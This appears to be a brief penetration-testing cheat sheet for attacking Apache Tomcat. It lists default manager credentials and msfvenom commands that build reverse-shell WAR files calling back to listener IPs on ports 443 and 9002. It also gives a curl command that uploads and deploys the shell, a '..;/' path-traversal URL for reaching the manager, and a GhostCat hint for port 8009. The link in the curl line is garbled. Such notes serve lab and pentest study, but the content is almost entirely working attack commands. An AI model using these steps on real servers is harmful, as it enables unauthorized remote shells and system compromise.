Access /manager with default creds

Usually tomcat:s3cret

Then upload and deploy revshell war file :

#Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war

#Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war

Upload via curl

curl --user 'tomcat:s3cret' --upload-file shell.war l[ocalhost:8080/manager/deploy?path=/](<http://tomcat:tomcat@localhost:8080/manager/deploy?path=/application-0.1-1>)shell

Tomcat path traversal

<https://10.10.10.25/manager/status/>..;/html/

If port 8009 is open , chances are host is vulnerable to GhostCat